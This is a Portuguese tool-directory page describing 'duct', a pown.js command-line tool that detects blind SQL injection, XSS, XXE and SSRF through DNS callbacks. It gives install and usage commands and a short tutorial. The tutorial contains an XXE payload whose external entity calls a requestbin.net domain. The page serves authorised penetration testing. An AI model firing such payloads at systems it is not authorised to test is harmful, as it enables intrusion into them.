Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
duct — Ferramenta essencial para encontrar ataques de injeção cega. | Kitploit
Ferramentas/GitHubGitHub/pownjs/duct
Exploração de Aplicações WebColeta de InformaçõesAnálise de DNS
GitHubpownjs/duct

duct

Ferramenta essencial para encontrar ataques de injeção cega.

Ver Repositório
49133há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Follow on Twitter NPM Fury

Pown Duct

Ferramenta essencial para encontrar ataques de injeção cega usando canais laterais de DNS.

Créditos

Esta ferramenta faz parte da iniciativa open-source secapps.com.

root@kitploit:~
  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

NB: Esta ferramenta está utilizando o serviço http://requestbin.net. Versões futuras usarão uma infraestrutura dedicada e personalizada.

Início rápido

Esta ferramenta é destinada a ser usada como parte do Pown.js, mas também pode ser invocada separadamente como uma ferramenta independente.

Instale o Pown primeiro como de costume:

root@kitploit:~
$ npm install -g pown@latest
Baixar ferramenta

Invoque diretamente do Pown:

root@kitploit:~
$ pown duct

Caso contrário, instale este módulo localmente a partir da raiz do seu projeto:

root@kitploit:~
$ npm install @pown/duct --save

Feito isso, invoque o CLI do pown:

root@kitploit:~
$ ./node_modules/.bin/pown-cli duct

Você também pode usar o pown global para invocar a ferramenta localmente:

root@kitploit:~
$ POWN_ROOT=. pown duct

Uso

root@kitploit:~
pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

root@kitploit:~
pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

Tutorial

Existem casos em que precisamos realizar um ataque como injeção SQL, XSS, XXE ou SSRF, mas a aplicação alvo não fornece nenhuma indicação de que é vulnerável. Uma forma de ter certeza se uma vulnerabilidade está presente é tentar injetar um vetor de ataque válido que force um resolvedor DNS a perguntar por um domínio controlado. Se a resolução for bem-sucedida, o ataque será considerado bem-sucedido.

NOTA: Você pode estar familiarizado com o Burp Collaborator, que fornece um serviço semelhante para clientes.

Primeiro, precisamos de um nome DNS descartável para resolver:

root@kitploit:~
$ pown duct dns

captura de tela

Usando o DNS fornecido, componha seu payload. Por exemplo, o seguinte poderia disparar uma resolução DNS se uma vulnerabilidade XXE estiver presente.

root@kitploit:~
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

Se o ataque foi bem-sucedido, receberemos uma mensagem no terminal.

captura de tela